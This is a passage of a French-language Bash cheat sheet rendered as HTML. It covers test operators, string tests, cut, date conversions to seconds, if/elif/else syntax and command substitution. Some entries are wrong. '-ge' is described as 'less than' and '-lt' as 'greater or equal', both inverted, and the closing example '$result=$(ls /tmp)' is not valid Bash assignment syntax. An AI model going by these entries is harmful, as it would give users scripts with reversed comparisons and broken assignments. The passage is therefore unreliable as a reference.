-ge <span class="c1"># Plus petit que</span>
-lt <span class="c1"># Plus grand ou égale que</span>
-le <span class="c1"># Plus petit ou égale que</span>
</code></pre></div>
<h2>Caractère</h2>
<div class="highlight"><pre><span></span><code><span class="o">=</span> / <span class="o">==</span> <span class="c1"># Egale</span>
!<span class="o">=</span> <span class="c1"># Non égale</span>
< <span class="c1"># Inférieur (ordre ASCII)</span>
> <span class="c1"># Supérieur (ordre ASCII)</span>
-z <span class="c1"># Longeur zéro (null)</span>
-n <span class="c1"># Non null</span>
</code></pre></div>
<h2>Chaîne de caractères</h2>
<h3>Récupérer une colonne</h3>
<div class="highlight"><pre><span></span><code><span class="c1"># d -> délimiteur</span>
<span class="c1"># f -> colonne à garder</span>
$ <span class="nb">echo</span> <span class="s2">"10:42:36"</span> <span class="p">|</span> cut -d <span class="s2">":"</span> -f <span class="m">2</span>
<span class="m">42</span>
</code></pre></div>
<h2>Temps</h2>
<h3>Conversion en seconde</h3>
<p><em>Secondes écoulées depuis le 1 Janvier 1970 00:00 UTC</em></p>
<div class="highlight"><pre><span></span><code><span class="k">$(</span>date -u -d <span class="s2">"</span><span class="nv">$TIME</span><span class="s2">"</span> +<span class="s2">"%s"</span><span class="k">)</span>
</code></pre></div>
<h3>Différence en secondes</h3>
<div class="highlight"><pre><span></span><code><span class="k">$(</span>date -u -d <span class="s2">"0 </span><span class="nv">$CURRENT_S</span><span class="s2"> sec - </span><span class="nv">$TIME_S</span><span class="s2"> sec"</span> +<span class="s2">"%H:%M:%S"</span><span class="k">)</span>
</code></pre></div>
<h2>Tests logiques</h2>
<div class="highlight"><pre><span></span><code><span class="k">if</span> <span class="o">[</span> expression <span class="o">]</span>
<span class="k">then</span>
statement
<span class="k">elif</span> <span class="o">[</span> expression<span class="o">]</span>
<span class="k">then</span>
statement
<span class="k">else</span>
statement
<span class="k">fi</span>
</code></pre></div>
<h2>Exécution de commande</h2>
<div class="highlight"><pre><span></span><code><span class="nv">$result</span><span class="o">=</span><span class="k">$(</span>ls /tmp<span class="k">)</span>
</code></pre></div>